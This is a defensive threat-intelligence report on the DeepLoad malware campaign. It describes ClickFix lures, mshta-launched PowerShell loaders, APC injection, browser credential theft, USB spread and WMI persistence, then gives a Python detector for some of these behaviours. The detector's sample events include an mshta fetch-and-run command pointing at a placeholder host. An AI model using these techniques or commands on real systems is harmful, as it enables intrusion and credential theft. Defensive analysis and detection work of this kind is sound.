DeepLoad Malware
A newly identified attack campaign employs the ClickFix social engineering technique to initiate infection. Victims are manipulated into executing malicious PowerShell commands by pasting them into the Windows Run dialog under the guise of resolving a fabricated system issue. This initial step leverages mshta.exe, a legitimate Windows utility, to retrieve and execute an obfuscated PowerShell-based loader.
Obfuscation Engineered for Evasion
The PowerShell loader conceals its true purpose behind a large number of meaningless variable assignments, which significantly complicates static analysis. Evidence suggests that artificial intelligence tools were used to construct this obfuscation layer, adding to its sophistication. The approach lets the malware slip past traditional detection mechanisms while still functioning as intended.
Stealth Through System Camouflage
DeepLoad is specifically designed to blend into standard Windows operations. The payload is stored in an executable named LockAppHost.exe, the name of the legitimate process that manages the Windows lock screen. To further obscure its presence, the malware disables PowerShell command history and directly invokes native Windows core functions instead of relying on standard PowerShell commands, which lets it evade monitoring that tracks PowerShell activity.
Fileless Techniques and Dynamic Payload Generation
To minimize detection, DeepLoad avoids leaving consistent artifacts on disk. It dynamically generates a secondary component using PowerShell’s Add-Type feature, compiling C# code into a temporary DLL file stored in the user’s Temp directory. Each execution produces a uniquely named file, effectively bypassing file-based detection methods that rely on known signatures.
Advanced Injection for Covert Execution
A key evasion strategy involves the use of asynchronous procedure call (APC) injection. The malware launches a legitimate Windows process in a suspended state, injects shellcode directly into its memory, and resumes execution. This method ensures that the malicious payload runs within a trusted process without writing a decoded version to disk, significantly reducing its forensic footprint.
Persistent Credential Theft Mechanisms
DeepLoad is engineered to extract sensitive user data immediately upon execution. Its capabilities include:
- Harvesting stored browser passwords directly from the infected system
- Deploying a malicious browser extension that captures credentials in real time during login attempts and persists across sessions unless manually removed
Lateral Spread via Removable Media
The malware incorporates propagation techniques designed to exploit removable storage devices. Upon detecting USB drives or similar media, it copies malicious shortcut files disguised as legitimate installers. These files are named to appear trustworthy, increasing the likelihood of user interaction and further infection.
Silent Reinfection Through WMI Abuse
DeepLoad establishes persistence using Windows Management Instrumentation (WMI). It creates event subscriptions that trigger reinfection after a delay of three days, requiring no user interaction or attacker involvement. This technique also disrupts traditional detection models by breaking expected parent-child process relationships.
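As an added defender-side example (not from the report or any detection product), the following Python classifies constructed Sysmon-style events for three behaviours described above: mshta.exe launched from explorer.exe with a URL (the ClickFix Run-dialog step), csc.exe compiling a DLL into the Temp directory (the Add-Type step), and creation of a WMI filter, consumer or binding (Sysmon event IDs 19 to 21). The event shapes, paths, names and the WQL query are assumptions made for the sample data.

```python
import re

# Constructed Sysmon-style events (dicts keyed by Sysmon field names); sample
# data written for this example, not telemetry from the DeepLoad report.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://placeholder.invalid/x"},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"csc.exe /noconfig /out:C:\Users\u\AppData\Local\Temp\q1w2e3r4.dll"},
    {"EventID": 19, "Name": "Updater", "EventNamespace": "root/cimv2",   # assumed filter name/query
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 "
              "WHERE TargetInstance ISA 'Win32_LocalTime'"},
    {"EventID": 21, "Consumer": 'CommandLineEventConsumer.Name="Updater"',
     "Filter": '__EventFilter.Name="Updater"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",          # benign control event
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the DeepLoad-style behaviour labels that a single event matches."""
    hits = []
    eid = event.get("EventID")
    if eid == 1:
        image = _basename(event.get("Image", ""))
        parent = _basename(event.get("ParentImage", ""))
        cmd = event.get("CommandLine", "")
        # ClickFix: the Run dialog is hosted by explorer.exe, so mshta.exe started by
        # explorer with a URL argument matches the report's initial access step.
        if image == "mshta.exe" and parent == "explorer.exe" and re.search(r"https?://", cmd, re.I):
            hits.append("clickfix_mshta_from_run_dialog")
        # Add-Type: PowerShell compiling C# spawns csc.exe, which writes a DLL under Temp.
        if image == "csc.exe" and parent in ("powershell.exe", "pwsh.exe") \
                and re.search(r"\\temp\\[^\\\s]+\.dll", cmd, re.I):
            hits.append("addtype_temp_dll_compile")
    # Sysmon 19/20/21 record WMI filter, consumer and binding creation. Any new
    # permanent subscription deserves review; a clock-driven filter query fits the
    # delayed-reinfection pattern described above.
    elif eid in (19, 20, 21):
        hits.append("wmi_permanent_subscription")
        if eid == 19 and re.search(r"Win32_LocalTime|__TimerEvent", event.get("Query", ""), re.I):
            hits.append("wmi_time_based_trigger")
    return hits

def scan(events):
    """Map each matching event's index to its labels; events with no hits are omitted."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}
```

Running `scan(SAMPLE_EVENTS)` flags the first four constructed events and leaves the notepad.exe control event out; the same rules apply unchanged to real Sysmon exports once the fields are mapped.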
Strategic Objective: Full Kill Chain Coverage
The overall design of DeepLoad indicates a multi-functional malware framework capable of executing actions across the entire cyber kill chain. Its operational strategy focuses on:
- Avoiding disk-based artifacts to reduce detection opportunities
- Blending malicious activity within legitimate Windows processes
- Rapidly propagating across systems to expand its footprint
Indicators of a Scalable Threat Framework
The infrastructure and modular design associated with DeepLoad suggest the possibility of a shared or service-based deployment model. While characteristics are consistent with Malware-as-a-Service (MaaS) offerings, there is currently insufficient evidence to definitively confirm this classification.